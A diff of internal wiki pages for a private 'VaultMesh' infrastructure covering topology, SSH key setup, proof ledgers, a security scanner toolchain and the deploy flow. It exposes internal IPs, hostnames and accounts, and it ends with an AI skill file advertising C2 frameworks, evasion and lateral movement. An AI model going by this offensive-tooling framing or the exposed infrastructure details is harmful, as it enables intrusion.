- Forge Flow: Android/laptop → SSH (Tailscale) → nexus-0 → edit/test → git push → GitLab on gate-vm → CI → deploy to shield-vm / lab.
- Backup Flow: mesh-stack-migration bundle backs up GitLab/Postgres/Vaultwarden to MinIO with freshness monitoring and restore scripts.
- Proof Flow: VaultMesh engines emit receipts and Merkle roots; DevOps release pipeline anchors PROOF.json and ROOT.txt to external ledgers.
Inputs:
- Per-node SSH keypairs and Tailscale identities.
- Git repositories (vaultmesh, mesh-stack-migration, offsec labs).
- Docker/Compose definitions for core stack (gate-vm).
- libvirt VM definitions on brick hypervisor.
Outputs:
- Authenticated SSH sessions over Tailscale with per-node isolation.
- Reproducible infrastructure stack (mesh-stack-migration) deployable onto any compatible host.
- Cryptographically verifiable receipts, Merkle roots, and anchored proof artifacts.
- Observability dashboards for infrastructure health and backup freshness.
Security Notes:
- No password SSH: ed25519 keys only, with IdentitiesOnly enforced.
- Tailscale tailnet isolates nodes from the public internet; v1-nl-gate used as controlled edge.
- Dual-vault split: Vaultwarden for human secrets; HashiCorp Vault for machine/app secrets and CI.
- Backups stored in MinIO, monitored by backup-freshness service with Prometheus metrics and Grafana alerts.
Nodes / Topology:
- Forge Node: nexus-0 (BlackArch) primary development forge.
- Mine Nodes: gamma, beta, brick, w3 home infra, storage, hypervisor.
- Gate Nodes: v1-nl-gate (cloud edge), gate-vm (mesh-core-01 on brick).
- VM Nodes on brick: debian-golden (template), gate-vm (core stack), shield-vm (security).
- Lab HV Nodes: lab-mesh-01, lab-agent-01, lab-chaos-01, phoenix-01 experiments and PSI/Phoenix.
- Mobile Nodes: shield (Termux), bank-mobile (iOS).
Dependencies:
- Tailscale client on all nodes (including VMs where needed).
- libvirt/QEMU on brick for virtualization.
- Docker/Compose on gate-vm for mesh-core stack.
- SSH servers on all nodes; per-node SSH keys for access.
Deployment Requirements:
- At least one capable hypervisor (brick) and one external gate (v1-nl-gate).
- DNS or MagicDNS entries for internal hostnames (e.g. gitlab.mesh.local).
- MinIO and backup-freshness configured via mesh-stack-migration bundle.
- Dual-vault services deployed according to canonical pattern.
Linked Assets:
- `/Users/sovereign/Library/CloudStorage/Dropbox/VaultMesh_Catalog_v1/VaultMesh_Infrastructure_Catalog_v1.*`
- `mesh-stack-migration/` bundle for core stack deployment.
- `vaultmesh` repo (Guardian, Console, Treasury, OffSec engines).

View File

@@ -0,0 +1,59 @@
Page Title: Canonical Infrastructure — VaultMesh v1
Summary: This page defines the canonical infrastructure for VaultMesh as of the first full catalog: which nodes exist, what runs where, and which services are considered "core mesh". It is the reference snapshot for future migrations and evolutions.
Key Findings:
- BRICK + v1-nl-gate + nexus-0 form the spine of the system.
- gate-vm (mesh-core-01) is the canonical host for the mesh-stack-migration bundle.
- shield-vm is the canonical Shield/TEM node with OffSec tooling and machine-secrets vault.
- Dual-vault pattern is standard: Vaultwarden (human), HashiCorp Vault (machine).
- Grafana is the canonical dashboard layer; Wiki.js is explicitly **not** part of the new architecture (external portals like burocrat serve documentation).
Canonical Nodes and Roles:
| Node | Role | Description |
|--------------|------------------------------|---------------------------------------------|
| nexus-0 | Forge | Primary dev/forge node (BlackArch) |
| brick | Hypervisor | Hosts core VMs (debian-golden, gate-vm, shield-vm) |
| v1-nl-gate | External Gate | Cloud-facing edge server, future ingress |
| gate-vm | mesh-core-01 (Core Stack) | GitLab, MinIO, Postgres, Prometheus, Grafana, Vaultwarden, backup-freshness, Traefik, WG-Easy |
| shield-vm | shield-01 (Shield/TEM) | OffSec agents, TEM, HashiCorp Vault, incidents & simulations |
| lab-* | Experimental Mesh | lab-mesh-01, lab-agent-01, lab-chaos-01, phoenix-01 |
Canonical Core Services (gate-vm / mesh-core-01):
- GitLab source control, CI/CD.
- MinIO object storage & backups.
- PostgreSQL GitLab and future service DBs.
- Prometheus metrics.
- Grafana dashboards (infra, backup freshness, proof metrics).
- Vaultwarden human password vault (browsers, logins).
- backup-freshness monitors MinIO backup age.
- Traefik reverse proxy and ingress.
- WG-Easy (optional) simplified WireGuard access.
Canonical Security / Shield Services (shield-vm):
- HashiCorp Vault machine/app secrets.
- TEM daemon threat transmutation engine.
- OffSec tools and MCP Oracle, Shield, AppSec scanners.
- Agent/task scheduler scheduled security workflows.
- Optional: local Prometheus exporters for node/security metrics.
Explicitly Non-Core (but allowed as external):
- Wiki.js not part of canonical infra; documentation handled via Git-based docs/portals (e.g., burocrat, catalogs).
- Legacy projects marked ARCHIVE (e.g., old offsec-shield architecture, sovereign-swarm).
Migration & Portability:
- `mesh-stack-migration/` enables redeploying the entire core stack (GitLab, MinIO, monitoring, backup) to a fresh host:
- Copy bundle → set `.env``docker compose up -d`.
- Run FIRST-LAUNCH and DRY-RUN checklists.
- VMs can be moved or recreated using debian-golden as base.
Evolution Rules:
- If a service becomes critical and stateful, it must:
- Emit receipts and have a documented backup/restore plan.
- Expose metrics consumable by Prometheus.
- Be referenced in the Canonical Infrastructure page with node placement.
- Experimental services stay on Lab HV until they prove their value.
Linked Assets:
- `mesh-stack-migration/STACK-MANIFEST.md` and `STACK-VERSION`.
- `VAULTMESH-ETERNAL-PATTERN.md` (architectural shape).
- `VaultMesh_Infrastructure_Catalog_v1.*` (this catalog).

View File

@@ -0,0 +1,76 @@
Page Title: VaultMesh Node Topology (Canon v1)
Summary: VaultMesh spans four primary tiers—Forge, Mine, Gate, and Lab—with mobile endpoints riding on top. The BRICK hypervisor anchors the virtualization layer, while v1-nl-gate acts as the outer gate. The result is a flexible topology where code forges on nexus-0, lands in GitLab on gate-vm, and manifests on shield-vm and lab nodes.
Key Findings:
- Clear separation between Forge (nexus-0), Core Mesh (gate-vm on brick), Edge Gate (v1-nl-gate), and Lab HV (ephemeral).
- BRICK hypervisor hosts the critical core VMs: debian-golden (template), gate-vm (mesh-core-01), shield-vm (shield-01).
- Tailscale tailnet binds everything together with MagicDNS and per-node hostnames.
- v1-nl-gate is ready to act as external ingress or exit node for future services.
- Node roles are stable but designed to evolve; lab nodes are intentionally ephemeral.
Components:
- Forge Tier: nexus-0 (BlackArch) and optional kali-forge.
- Mine Tier: gamma, beta, brick, w3 primary physical infra.
- Gate Tier: v1-nl-gate (cloud gate), gate-vm on brick (core stack).
- VM Tier: debian-golden (golden image), gate-vm (core services), shield-vm (OffSec/TEM).
- Lab Tier: lab-mesh-01, lab-agent-01, lab-chaos-01, phoenix-01.
Node Inventory:
FORGE NODES:
| Node | Hostname | OS | Role |
|-----------|---------------------------|-----------|----------------------|
| nexus-0 | 100.67.39.1 (Tailscale) | BlackArch | Primary forge (dev) |
| kali-forge| (Tailscale IP) | Kali | Secondary OffSec lab |
MINE NODES Primary Infrastructure:
| Node | Hostname | OS | Role |
|--------|---------------------------|-------------|-------------------|
| gamma | gamma.story-ule.ts.net | Arch Linux | Home primary |
| beta | beta.story-ule.ts.net | Arch Linux | Backup node |
| brick | brick.story-ule.ts.net | Debian | Dell server, HV |
| w3 | w3.story-ule.ts.net | Raspbian | Raspberry Pi node |
GATE NODES Edge / Exit:
| Node | Hostname | OS | Role |
|------------|-------------------------------|--------|-----------------------------|
| v1-nl-gate | v1-nl-gate.story-ule.ts.net | Debian | Netherlands external gate |
| gate-vm | gate-vm.story-ule.ts.net | Debian | mesh-core-01 (core stack) |
VM NODES On brick (libvirt/KVM):
| Node | Hostname | OS | Role |
|---------------|---------------------------------|--------|-------------------------------|
| debian-golden | debian-golden.story-ule.ts.net | Debian | Golden image / template |
| gate-vm | gate-vm.story-ule.ts.net | Debian | Core services (GitLab, etc.) |
| shield-vm | shield-vm.story-ule.ts.net | Debian | Shield / TEM / machine vault |
LAB NODES Experimental (Lab HV):
| Node | Hostname | Role |
|--------------|---------------------|----------------------------------|
| lab-mesh-01 | lab-mesh-01 | Multi-node mesh tests |
| lab-agent-01 | lab-agent-01 | Agent/orchestration experiments |
| lab-chaos-01 | lab-chaos-01 | Chaos/failure drills |
| phoenix-01 | phoenix-01 | Phoenix/PSI prototypes |
MOBILE NODES:
| Node | Hostname | OS | Port |
|-------------|-------------------------------|---------------|-------|
| shield | shield.story-ule.ts.net | Android/Termux| 22 |
| bank-mobile | bank-mobile.story-ule.ts.net | iOS | 8022 |
LAN Fallbacks:
| Node | LAN IP |
|-------|----------------|
| gamma | 192.168.0.191 |
| brick | 192.168.0.119 |
| beta | 192.168.0.236 |
Security Notes:
- Forge, Mine, Gate, and Lab communicate primarily via Tailscale; LAN is a fallback.
- VMs are isolated on libvirt NAT (192.168.122.x), with SSH + Tailscale as ingress.
- v1-nl-gate can be used as WireGuard / exit node for privacy routing.
Dependencies:
- Tailscale on all nodes (physical and virtual as required).
- libvirt/QEMU on brick for VM lifecycle.
- SSH with per-node ed25519 keys.

View File

@@ -0,0 +1,64 @@
Page Title: VaultMesh Virtualization Layer (BRICK Hypervisor)
Summary: The BRICK server runs libvirt/KVM and hosts the core VaultMesh VMs: debian-golden (template), gate-vm (mesh-core-01), and shield-vm (shield-01). Cockpit and VNC provide management and console access, while Tailscale and SSH bring the VMs into the wider mesh.
Key Findings:
- BRICK is the single hypervisor for core VaultMesh VMs.
- debian-golden serves as a reusable golden image to clone new VMs.
- gate-vm runs the mesh-stack-migration bundle (GitLab, MinIO, Prometheus, Grafana, Vaultwarden, backup-freshness, etc.).
- shield-vm is the Shield/OffSec node and home of the machine-secrets vault and TEM stack.
- VM networking uses libvirt NAT (192.168.122.x), with VNC reachable via SSH tunnels.
Components:
- libvirt daemon (qemu-kvm backend).
- QEMU/KVM for hardware-accelerated virtualization.
- Cockpit + cockpit-machines for web-based VM management.
- VNC servers for graphical consoles.
- Tailscale agents (optional/desired) inside VMs.
VM Network Layout:
| VM | NAT IP | VNC Port | Role |
|---------------|------------------|----------|------------------------------------|
| debian-golden | 192.168.122.187 | 5900 | Golden image / base template |
| gate-vm | 192.168.122.236 | 5901 | mesh-core-01 core stack host |
| shield-vm | 192.168.122.73 | 5902 | Shield/OffSec/TEM + machine vault |
Workflows / Pipelines:
- VM Management: Cockpit → https://brick:9090 → "Virtual Machines".
- Console Access:
- `ssh brick`
- `ssh -L 5901:localhost:5901 brick`
- `vnc://localhost:5901` (gate-vm) / `vnc://localhost:5902` (shield-vm).
- Image Pipeline:
- Update debian-golden → snapshot → clone → new VM (e.g., future lab nodes).
- Join to Mesh:
- Boot VM → configure SSH → join Tailscale → register in SSH config.
Inputs:
- libvirt XML definitions for debian-golden, gate-vm, shield-vm.
- Debian cloud images / base images.
- SSH keys for root/debian users on each VM.
- mesh-stack-migration bundle to configure gate-vm.
Outputs:
- Running core VMs with access via SSH + Tailscale + VNC.
- Reproducible VM lifecycle (golden → clone → configure → join mesh).
- Isolated environment for Shield/TEM experiments on shield-vm.
Security Notes:
- VNC ports are not exposed directly; they're reached via SSH tunnel into brick.
- Each VM uses its own SSH host keys and per-node authorized_keys.
- NAT isolation (192.168.122.x) reduces blast radius from VM compromise.
- Installing Tailscale inside gate-vm/shield-vm avoids public exposure.
Dependencies:
- libvirt, qemu-kvm, Cockpit, cockpit-machines on brick.
- SSH and Tailscale inside each VM (where needed).
- TigerVNC or similar client on the operator's laptop.
Deployment Steps:
1. Start VM via Cockpit or `virsh`.
2. Create SSH tunnel from laptop to brick for VNC.
3. Connect via VNC for first-boot setup if needed.
4. Deploy SSH keys and install Tailscale inside the VM.
5. For gate-vm: deploy `mesh-stack-migration` and start core stack.
6. For shield-vm: deploy Shield/TEM/dual-vault components.

View File

@@ -0,0 +1,101 @@
Page Title: SSH Key Architecture (Forge + Mesh)
Summary: VaultMesh uses a strict per-node ed25519 SSH key model with IdentitiesOnly isolation, ControlMaster multiplexing, and mesh-wide access via Tailscale. nexus-0 serves as the primary forge node; brick, v1-nl-gate, gate-vm, and shield-vm are first-class SSH targets with dedicated keys.
Key Findings:
- One keypair per destination node (id_gamma, id_brick, id_v1-nl-gate, id_gate-vm, id_shield-vm, etc.).
- IdentitiesOnly enforces key isolation and prevents cross-host key probing.
- ControlMaster/ControlPath provide fast multiplexed SSH sessions.
- Tailscale hostnames (story-ule.ts.net) give stable addressing; LAN IPs are fallback.
- External service keys (GitHub/GitLab) are separate from infra keys.
Components:
- Per-node private keys (`~/.ssh/id_{node}`).
- Public keys (`~/.ssh/id_{node}.pub`).
- SSH config with host-specific IdentityFile blocks.
- Control sockets (`~/.ssh/cm-%r@%h:%p`).
Key Inventory (Infra Nodes):
| Key File | Target Node | Algorithm |
|------------------|----------------|-----------|
| id_gamma | gamma | ed25519 |
| id_beta | beta | ed25519 |
| id_brick | brick | ed25519 |
| id_w3 | w3 | ed25519 |
| id_v1-nl-gate | v1-nl-gate | ed25519 |
| id_gate-vm | gate-vm | ed25519 |
| id_debian-golden | debian-golden | ed25519 |
| id_shield-vm | shield-vm | ed25519 |
Forge + Mobile:
| Key File | Target | Algorithm |
|------------------|--------------|-----------|
| id_nexus-0 | nexus-0 | ed25519 |
| id_kali-forge | kali-forge | ed25519 |
| id_shield | shield | ed25519 |
| id_bank-mobile | bank-mobile | ed25519 |
External Service Keys:
| Key File | Service |
|----------------------|------------|
| id_ed25519_github | GitHub |
| id_ed25519_gitlab | GitLab |
SSH Config Structure:
```sshconfig
Host *
ServerAliveInterval 30
ServerAliveCountMax 3
TCPKeepAlive yes
ControlMaster auto
ControlPath ~/.ssh/cm-%r@%h:%p
ControlPersist 10m
IdentitiesOnly yes
HashKnownHosts no
StrictHostKeyChecking accept-new
AddKeysToAgent yes
UseKeychain yes
Compression yes
Host nexus-0
HostName 100.67.39.1
User root
IdentityFile ~/.ssh/id_nexus-0
Host brick
HostName brick.story-ule.ts.net
User sovereign
IdentityFile ~/.ssh/id_brick
Host gate-vm
HostName gate-vm.story-ule.ts.net
User debian
IdentityFile ~/.ssh/id_gate-vm
Host shield-vm
HostName shield-vm.story-ule.ts.net
User debian
IdentityFile ~/.ssh/id_shield-vm
```
Security Notes:
- ed25519 keys provide strong security with small keys/signatures.
- IdentitiesOnly ensures ssh never offers the wrong key to the wrong host.
- StrictHostKeyChecking=accept-new uses TOFU while still catching host key changes.
- No password authentication; all critical nodes are key-only.
Key Generation:
```bash
ssh-keygen -t ed25519 -f ~/.ssh/id_{node} -C "aurion-to-{node}"
```
Key Deployment:
```bash
ssh-copy-id -i ~/.ssh/id_{node}.pub debian@{node}
# Or manually
cat ~/.ssh/id_{node}.pub | ssh debian@{node} "cat >> ~/.ssh/authorized_keys"
```
Dependencies:
- OpenSSH client (macOS/Linux/Android).
- ssh-agent and (on macOS) Keychain integration.
- Tailscale for stable hostnames and reachability.

View File

@@ -0,0 +1,71 @@
Page Title: Cryptographic Proof System (VaultMesh Proof Spine)
Summary: VaultMesh uses a Merkle-tree-based proof system with receipts, roots, and cross-ledger anchoring. Each serious action (deploy, anchor, oracle decision, incident handling) emits a receipt. DevOps pipelines produce PROOF.json and ROOT.txt artifacts and anchor them to external ledgers, turning infrastructure history into a verifiable "civilization ledger".
Key Findings:
- All significant actions generate cryptographic receipts in append-only logs.
- Merkle trees allow efficient inclusion proofs for large sets of receipts.
- Anchors can be written to local files, Bitcoin (OTS), Ethereum, or mesh peers.
- The release pipeline for vm-spawn automatically computes Merkle roots and anchors proof artifacts.
- Braid-style interoperability allows importing and emitting foreign ledger roots.
Components:
- Proof Generator (`proof_generate`) creates signed receipts.
- Merkle Batcher (`proof_batch`) aggregates receipts into Merkle trees.
- Anchor System (`proof_anchor_*`) writes roots to durable anchors.
- Verification Engine (`proof_verify`) validates inclusion and integrity.
- Braid Protocol (`proof_braid_*`) cross-ledger interoperability.
Proof Lifecycle:
1. Action occurs (e.g., Guardian anchor, deployment, oracle decision).
2. `proof_generate` creates a signed receipt with a Blake3 hash of the canonical JSON.
3. Receipts accumulate until a batch threshold is reached.
4. `proof_batch` constructs a Merkle tree and computes the root.
5. `proof_anchor_*` writes the root to local files, timestamps, or blockchains.
6. `proof_verify` allows any future verifier to confirm receipt integrity against a given root.
Anchoring Strategies:
| Type | Method | Durability |
|-------|---------------------------------|---------------------|
| local | Files in `data/anchors/` | Node-local |
| ots | OpenTimestamps → Bitcoin | Public blockchain |
| eth | Calldata/contract → Ethereum | Public blockchain |
| mesh | Cross-attest via other nodes | Federated durability|
Braid Protocol:
- `braid_import` import foreign ledger roots from other chains/nodes.
- `braid_emit` expose local roots for others to import.
- `braid_status` track imported vs. local roots and regression.
- Ensures root sequences are strictly advancing (no rollback without detection).
Receipt Schema (Conceptual):
```json
{
"proof_id": "uuid",
"action": "guardian_anchor",
"timestamp": "ISO8601",
"data_hash": "blake3_hex",
"signature": "ed25519_sig",
"witnesses": ["node_id"],
"chain_prev": "prev_proof_id"
}
```
Security Notes:
- Blake3 hashing for speed and modern security.
- Ed25519 signatures for authenticity and non-repudiation.
- Merkle trees make inclusion proofs O(log n).
- Multiple anchoring paths provide defense in depth against ledger loss.
DevOps Integration:
- vm-spawn release pipeline:
- Computes Merkle root over build artifacts.
- Requests RFC 3161 timestamp.
- Anchors hash on Ethereum and Bitcoin.
- Emits PROOF.json and ROOT.txt alongside release assets.
- Guardian CLI (vm_cli.py guardian) provides human-readable views over roots and scrolls.
Dependencies:
- Blake3 library.
- Ed25519 signing library and key management.
- Optional OTS/BTC/ETH client libraries or APIs.
- OffSec MCP / VaultMesh services exposing proof tools.

View File

@@ -0,0 +1,72 @@
Page Title: Lawchain Compliance Ledger
Summary: Lawchain is the compliance-focused ledger that tracks regulatory obligations, oracle answers, and audit trails via receipts. It integrates with the proof system to ensure every compliance answer has a cryptographic backbone, and it is designed to speak the language of EU AI Act, GDPR, NIS2, and future frameworks.
Key Findings:
- Oracle answers are validated against a schema before being recorded.
- Each answer is hashed and bound into a receipt, linking legal semantics to proofs.
- Federation metrics allow multi-node Lawchain sync across the mesh.
- Policy evaluation is driven by JSON inputs and produces JSON results for downstream tools.
Components:
- Lawchain Core Ledger (append-only compliance scroll).
- Oracle Answer Validator (schema enforcement).
- Compliance Scroll store (receipt logs).
- Federation Metrics emitter.
- Policy Evaluator (rule engine).
Oracle Answer Schema (vm_oracle_answer_v1):
```json
{
"question": "string",
"answer_text": "string",
"citations": [{
"document_id": "string",
"framework": "string",
"excerpt": "string"
}],
"compliance_flags": {
"gdpr_relevant": true,
"ai_act_relevant": false,
"nis2_relevant": true
},
"gaps": ["string"],
"insufficient_context": false,
"confidence": "high"
}
```
Workflows / Pipelines:
- Compliance Q&A:
1. Operator (or system) asks Lawchain a question.
2. RAG/Retrieve context from policy docs and regulations.
3. LLM generates an answer draft.
4. Answer is validated against vm_oracle_answer_v1 schema.
5. Hash (Blake3 over canonical JSON) computed and receipt generated.
6. Receipt anchored via proof system and stored in Lawchain.
Metrics Files (examples under /tmp/):
| File | Purpose |
|-------------------------|----------------------------|
| lawchain_federate.out | Federation sync output |
| lawchain_federate.err | Federation errors |
| lawchain_metrics.out | Metrics/logging output |
| policy_eval_out.json | Policy evaluation results |
| policy_input.json | Policy evaluation input |
Security Notes:
- Answer hash computed as blake3(json.dumps(answer, sort_keys=True)).
- Receipts bind answer content, timestamps, and possibly node identity.
- gaps and insufficient_context prevent fake certainty in legal answers.
- Citations must reference real sources, enabling audit of answer provenance.
Compliance Frameworks Tracked:
- GDPR data protection and subject rights.
- EU AI Act risk classification, obligations, and logs.
- NIS2 network and information security.
- Custom extensions can map additional frameworks (e.g., SOC2, ISO 27001).
Dependencies:
- Lawchain service.
- Oracle corpus indexed (policies, regulations, internal docs).
- Blake3 and JSON schema validator.
- Integration with VaultMesh proof spine for receipts and anchoring.

View File

@@ -0,0 +1,83 @@
Page Title: Oracle Engine & Shield Defense (TEM Stack)
Summary: The Oracle Engine provides structured reason → decide → act chains, while Shield and TEM form the defensive veil. Together they detect threats, log them to the proof system, and (optionally) orchestrate responses across shield-vm, lab nodes, and the wider mesh.
Key Findings:
- Oracle chains decisions through explicit reasoning steps, not opaque actions.
- Every significant decision can emit receipts into the proof spine.
- Shield monitors multiple vectors (network, process, file, device, etc.).
- Response levels span from passive logging to active isolation or countermeasures.
- Agent tasks allow scheduled or triggered operations (e.g., periodic scans).
Components:
- Oracle Reasoning Engine.
- Oracle Decision System.
- Tactical Chain Executor.
- Shield Monitor (sensors).
- Shield Responder (actions).
- TEM daemon (threat transmutation logic).
- Agent Task Scheduler.
Oracle Tools:
| Tool | Purpose |
|------------------------|--------------------------------------|
| oracle_status | Node status and capabilities |
| oracle_reason | Analyze situation, propose actions |
| oracle_decide | Make autonomous decision |
| oracle_tactical_chain | Full reason → decide → act chain |
Oracle Tactical Chain Flow:
1. **Context**: Collect current state (logs, metrics, alerts, lawchain state).
2. **Reason**: `oracle_reason` produces candidate actions with justifications.
3. **Decide**: `oracle_decide` selects an action based on risk tolerance and constraints.
4. **Act**: Execute playbooks, or keep in dry-run mode for simulation.
5. **Prove**: Generate a receipt and anchor via proof system (optional but recommended).
Shield Monitor Vectors:
| Vector | Detection Capability |
|-----------|--------------------------------|
| network | Port scans, unusual flows |
| wifi | Rogue APs, deauth attempts |
| bluetooth | Device enumeration/anomalies |
| usb | Storage/HID abuse |
| process | Suspicious binaries, behavior |
| file | Unauthorized modifications |
Shield Response Levels:
| Level | Action |
|---------|----------------------------------------|
| log | Record event only |
| alert | Notify operator (Slack/email/etc.) |
| block | Prevent connection/action |
| isolate | Quarantine node/container/service |
| counter | Active response (e.g., honeypots) |
Agent Tasks:
```json
{
"name": "scheduled_scan",
"trigger": {
"type": "schedule",
"config": {"cron": "0 */6 * * *"}
},
"actions": [
{"tool": "shield_monitor", "args": {"vectors": ["network", "wifi"]}},
{"tool": "oracle_tactical_chain", "args": {"dry_run": true}}
],
"on_complete": "mesh_broadcast"
}
```
Security Notes:
- Dry-run mode is default for dangerous operations; production actions require explicit opt-in.
- Risk tolerance levels gate what Shield/TEM may do without human approval.
- All automated decisions can be bound to receipts for post-incident audit.
MCP / Mesh Tools:
- oracle_status, oracle_reason, oracle_decide, oracle_tactical_chain
- shield_status, shield_monitor, shield_respond
- Agent task management: agent_task, agent_list, agent_cancel
Dependencies:
- OffSec MCP server running on shield-vm/lab nodes.
- Proof system enabled for Oracle and Shield receipts.
- Integrations with metrics (Prometheus) and observability (Grafana).

View File

@@ -0,0 +1,87 @@
Page Title: AppSec Toolchain (Shield / CI Integration)
Summary: VaultMesh uses an integrated application security toolchain rooted on shield-vm and CI pipelines. It combines vulnerability scanning, secret detection, SBOM generation, and IaC analysis into a coherent flow, with findings eligible to be logged into the proof spine for high-risk assets.
Key Findings:
- Nuclei, Trivy, Semgrep, TruffleHog, Gitleaks, Checkov, Syft, and Grype cover distinct layers.
- shield-vm is the natural home for heavy security scans and OffSec tooling.
- CI pipelines can call out to shield-vm or run scanners directly in job containers.
- Secret detection runs in both pre-commit and CI stages for defense-in-depth.
- SBOM generation and vulnerability scanning support long-term supply chain tracking.
Components:
- Nuclei (web and service vuln scanning).
- Trivy (container/filesystem/SBOM vulnerability scanner).
- Semgrep (static code analysis).
- TruffleHog / Gitleaks (secret discovery).
- Checkov (IaC misconfiguration scanner).
- Syft (SBOM generator).
- Grype (vulnerability scanner against SBOMs).
Tool Capabilities:
| Tool | Target Types | Output |
|------------|----------------------------|-------------------------|
| nuclei | URLs, IPs, domains | Findings by severity |
| trivy | Images, dirs, repos, SBOMs | CVEs, secrets, configs |
| semgrep | Source code directories | Security findings |
| trufflehog | Git, S3, GCS, etc. | Verified secrets |
| gitleaks | Git repos, filesystems | Secret locations |
| checkov | Terraform, K8s, Helm, etc. | Misconfigurations |
| syft | Images, dirs, archives | CycloneDX/SPDX SBOM |
| grype | Images, dirs, SBOMs | Vulnerability list |
Example Scans:
Nuclei Web Scan:
```json
{
"targets": ["https://example.com"],
"severity": ["high", "critical"],
"tags": ["cve", "rce"]
}
```
Trivy Container Scan:
```json
{
"target": "vaultmesh-core:latest",
"scan_type": "image",
"scanners": ["vuln", "secret"],
"severity": ["HIGH", "CRITICAL"]
}
```
Secret Detection:
```json
{
"target": "/srv/git/vaultmesh",
"source_type": "git",
"only_verified": true
}
```
MCP Tools:
- offsec_appsec_nuclei_scan
- offsec_appsec_trivy_scan
- offsec_appsec_semgrep_scan
- offsec_appsec_trufflehog_scan
- offsec_appsec_gitleaks_scan
- offsec_appsec_checkov_scan
- offsec_appsec_syft_sbom
- offsec_appsec_grype_scan
Workflows:
1. SBOM Pipeline: Syft → produce CycloneDX JSON → Grype → vulnerability report.
2. Pre-merge Scans: CI job runs Semgrep, Trivy, Gitleaks on merge requests.
3. Periodic Deep Scans: shield-vm runs scheduled AppSec scans, logging high-severity findings.
4. Policy Integration: High-severity or critical findings feed into Lawchain/Lawchain-like policies.
Security Notes:
- Nuclei and Trivy should be rate-limited when targeting external assets.
- Secret detection in CI uses only_verified where possible to reduce noise.
- Baseline files can exclude accepted findings while still tracking new issues.
- AppSec findings for high-value systems may be recorded as receipts in the proof system.
Dependencies:
- offsec-mcp server with tools installed (on shield-vm or lab nodes).
- Network access for pulling scanner templates and vulnerability databases.
- CI integration (GitLab pipelines on gate-vm) to trigger scans automatically.

View File

@@ -0,0 +1,85 @@
Page Title: Forge Flow — From Phone to Shield
Summary: The Forge Flow describes how code moves from the Sovereign's phone and forge node (nexus-0) through GitLab on gate-vm, into CI, and finally onto shield-vm and lab nodes. It is the canonical "path of sovereign code".
Key Findings:
- Primary forge is nexus-0 (BlackArch), reachable via Tailscale from Android/laptop.
- vaultmesh repo lives on nexus-0 under `/root/work/vaultmesh`.
- Git remote points to GitLab on gate-vm (gitlab.mesh.local).
- GitLab CI handles lint → test → build → deploy.
- Production-like deployments land on shield-vm; experiments land on Lab HV nodes.
Forge Flow Diagram (Text):
```text
Android / Laptop
↓ (Tailscale SSH)
nexus-0 (BlackArch forge)
↓ (git push)
GitLab @ gate-vm (mesh-core-01)
↓ (CI: lint → test → build)
shield-vm (Shield / TEM) and Lab HV (phoenix-01, etc.)
```
Steps:
1. Inception (Connect to Forge)
- From Android or laptop:
```bash
ssh VaultSovereign@100.67.39.1 # nexus-0 via Tailscale
tmux attach -t sovereign || tmux new -s sovereign
```
2. Forge (Edit & Test)
- On nexus-0:
```bash
cd /root/work/vaultmesh
nvim .
python3 -m pytest tests/ -v
python3 cli/vm_cli.py guardian status
python3 cli/vm_cli.py console sessions
```
3. Transmit (Git Push to GitLab)
```bash
git add -A
git commit -m "feat(guardian): improve anchor receipts"
git push origin main # or feature branch
```
4. Transform (GitLab CI on gate-vm)
- .gitlab-ci.yml stages:
- lint style and basic checks.
- test pytest and CLI tests.
- build container/image build.
- deploy optional manual or automatic deployment.
5. Manifest (Deploy to Shield or Lab)
- CI deploy job:
- For main: deploy to shield-vm (production-like).
- For lab branches: deploy to lab-mesh-01 / phoenix-01.
- Manual deploy (fallback):
```bash
ssh shield-vm
cd /opt/vaultmesh
git pull
sudo systemctl restart vaultmesh-mcp vaultmesh-tem
```
6. Observe (Metrics & Proofs)
- Grafana dashboards (gate-vm) for system and proof metrics.
- Guardian CLI for roots and scrolls.
- Lawchain/oracle dashboards for compliance view.
Infrastructure Roles in the Flow:
- nexus-0 → live forge, fast iteration, experiments.
- gate-vm → GitLab + CI + registry + observability.
- shield-vm → OffSec/TEM node and primary runtime for security engines.
- Lab HV → ephemeral experimentation environment.
Security Notes:
- SSH access to nexus-0 and shield-vm uses per-node ed25519 keys.
- GitLab access uses HTTPS with tokens or SSH keys.
- Deploy stage should be limited to trusted runners/tags.
Linked Assets:
- vaultmesh/.gitlab-ci.yml (CI pipeline).
- VAULTMESH-INFRA-OVERVIEW style documents.

Binary file not shown.

BIN
VaultMesh_Catalog_v1/skill/.DS_Store vendored Normal file

Binary file not shown.

Binary file not shown.

View File

@@ -0,0 +1,342 @@
---
name: sovereign-operator
description: Unified security operations framework combining OFFSEC-MCP (28 MCP tools), VaultMesh architecture, and Advanced Security Labs. Use when operating Shield nodes, invoking MCP tools (proof, mesh, shield, tactical, oracle, chain, recon, agent, mobile), managing VaultMesh subsystems, executing adversary emulation (Caldera, Atomic Red Team), writing Sigma rules, running C2 frameworks (Cobalt Strike, Sliver, Havoc), performing DFIR investigations, conducting purple team exercises, managing braid relationships, or operating in specialized domains (AD, cloud, K8s, mobile, wireless, OT/ICS, API). Triggers on "shield status", "mesh alerts", "tactical execute", "oracle reason", "recon passive", "spawn subsystem", "anchor root", "invoke Tem", "run atomic test", "write sigma rule", "C2 setup", "incident response", or any security operations workflow.
---
# 🜄 Sovereign Operator
Unified framework for security operations, combining:
- **OFFSEC-MCP** — 28 MCP tools across 9 categories
- **VaultMesh** — Self-evolving infrastructure with cryptographic proofs
- **Security Labs** — Adversary emulation, detection engineering, DFIR, and domain expertise
## Mental Model
```
┌─────────────────────────────────────────────────────────────┐
│ SOVEREIGN OPERATOR │
├─────────────────────────────────────────────────────────────┤
│ Brain │ oracle_*, chain │ Reason → Decide → Act │
│ Eyes/Ears │ mesh_*, recon_* │ Observe environment │
│ Spine │ shield_*, agent_* │ Defend + Automate │
│ Hands │ tactical_* │ Execute commands │
│ Memory │ proof_* │ Cryptographic receipts │
├─────────────────────────────────────────────────────────────┤
│ Red Team │ C2, evasion, persistence, lateral movement │
│ Blue Team │ DFIR, Sigma rules, EDR, SIEM correlation │
│ Purple Team │ Adversary emulation, BAS, ATT&CK coverage │
│ VaultMesh │ Subsystems, anchoring, Tem, alchemical cycles│
└─────────────────────────────────────────────────────────────┘
```
## Tool Categories (28 tools / 9 categories)
| Category | Tools | Purpose |
|----------|-------|---------|
| proof | 3 | `proof_generate`, `proof_verify`, `proof_anchor` |
| mesh | 6 | `mesh_console_ping`, `mesh_status`, `mesh_topology`, `mesh_alerts`, `mesh_backups`, `mesh_blast_radius` |
| shield | 3 | `shield_status`, `shield_monitor`, `shield_respond` |
| tactical | 3 | `tactical_execute`, `tactical_playbook`, `tactical_learn` |
